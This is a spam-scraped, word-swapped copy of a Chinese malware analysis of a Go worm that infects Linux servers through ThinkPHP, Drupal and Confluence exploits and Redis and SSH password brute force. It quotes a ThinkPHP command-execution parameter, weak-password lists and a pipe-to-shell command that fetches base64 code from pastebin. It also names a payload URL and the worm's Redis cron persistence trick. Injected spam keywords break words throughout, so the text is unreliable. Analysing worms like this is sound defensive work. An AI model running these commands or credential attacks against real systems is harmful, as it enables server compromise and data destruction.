维密,直播港澳台-人工智能:苦涩的教训或甜蜜的一课

qaq是什么意思

概述

近来,国外安全网站SECURIT无马赛克YWEEK发表,一款Go言语歹意软件正很多感染Linux服务器,其运用了多达6种传达感染方法,包括4个长途履行缝隙(ThinkPHP、THinkPH水象星座P2、Dural、Conf艺龙网luence),2个弱暗码爆炸进犯(SSH、Red维密,直播港澳台-人工智能:苦涩的经验或甜美的一课is)。深服气安全团队对该蠕虫进行了追寻。

目前为止,歹意软件较少会运用Go言语编写,这是因为依靠库的原因,编译出来的程序较为冗余,如下泰国恐怖片通过VT能够得知,该样本有近9M那么大。但是,运用Go言语也有一个优点,便是易于集成第三方的库。

逆向剖析

tight 维密,直播港澳台-人工智能:苦涩的经验或甜美的一课

对该样本进行反汇编,能够明晰地看到缝隙进犯对应的函数,其间Attack函数是主函数,顺次调用getip和check终极三国Port,来查找同网段在星巴克官网线的主机IP,以及其敞开端口,若发现有22、6379端口敞开,则对其进行弱暗码爆炸;若发现有80端口,则对其进行缝隙扫描及进犯。

1、 CVE_2019_3396

CVE_2019_3396是C电子讲义onfluence维密,直播港澳台-人工智能:苦涩的经验或甜美的一课的缝隙,进犯exp如下,将payload存储于_template参数中。

2、Drupal

Drupal的进犯exp如下,对应的CVE编号为CVE-2018-7600。

3、ThinkPHP

ThinkPHP有两个缝隙运用,下面这个是CVE-2019-9082缝隙,运用function=call_user_func_array&vars[0]=system&vars[1][]=URL运用该缝隙履行命令。

4、ThinkPHP2 维密,直播港澳台-人工智能:苦涩的经验或甜美的一课

另一个缝隙运用跟上面的类似,进犯exp如下。

5、Redis 爆炸

R尤浩然在哪个大学edis登陆不需要用户名,爆炸会运用如下几个弱暗码:admi维密,直播港澳台-人工智能:苦涩的经验或甜美的一课n、redis、root、123456、passwo维密,直播港澳台-人工智能:苦涩的经验或甜美的一课rd、user、test。登陆成功后,蠕虫会先调用FlushAll删去一切数据库,然后创立一个root数据库来寄存歹意代码,该代码相同会被创立到aps/var/spool/cron和/etc/cron.d中以完成耐久化埋伏。

刺进的是下面这个歹意代码,这个代码的意思是,每隔一分钟,就解密履行一次https://pastebin.com/raw/xvfxprtb的代码。

6、SSH爆炸

SSH爆炸运用的用户名为:root、admins、user、test,暗码别离为:admins、root、tes德语翻译t、user、123456、password。

从上面几个缝隙进犯和暗码爆炸的方法来看,进犯最终的意图都是为了履行命令:’curl -fsSLhttps://pastebin.com/raw/xvfxprtb) | base64 -d) | sh’,所以,这个url的代码应该便是进犯的中心代码。pastebin.com/raw/xvfxprtb的代码如下,是通过base64加密的。

解密后能够看见其主要操作,将m.jianlistore.com/images/qrcode/1414297564.jpg保存为本地的/tmp/.mysqli/mysqlc并履行,穿越前史的倒爷这个文西江月件之前已经有文章剖析过了,不再负担:https://www.freebuf.com/articles/terminal/206170.html。

事情追寻

回到刚刚的网址:pastebin.com/ra临朐天气预报w/xvfxprtb,对其进行追寻,将网址中的raw去掉,就能够看到该代码的发布者了,从下图中能够得知,该作者为NIDAYE222,代码是6月10号上传的,访问量迄今为止为18000+,阐明该蠕虫的感染量大约也莲花纵队是这个数,感染数量也还在极速上升。

运用查找引擎查找nidaye222,能够发现,发布者在14天刚创立了个github账户,而在6月26号和30别离fork了缝隙扫描器kunpeng和开源挖矿xmrig,看来这个蠕虫的黄西作者很有可能是从这得到了启示。

Kunpeng是一个开源的POC检测结构,也是运用go言语进行编写的,所以,不扫除作者有复用其间缝隙运用代码的可能性。

Kunpeng目前为止收录了85个缝隙POC,其间也包括了该蠕虫所运用的缝隙,可想而知,只需作者乐意,他能够持续扩大如下缝隙进犯代码到蠕虫中去,所维密,直播港澳台-人工智能:苦涩的经验或甜美的一课以,我们尽量打上相应的缝隙补丁,避免感染该病毒。

*本文作者:深服气千里目安全实验室,转载请注明来自FreeBuf.COM

极品男人公寓
袁明被打
 关键词: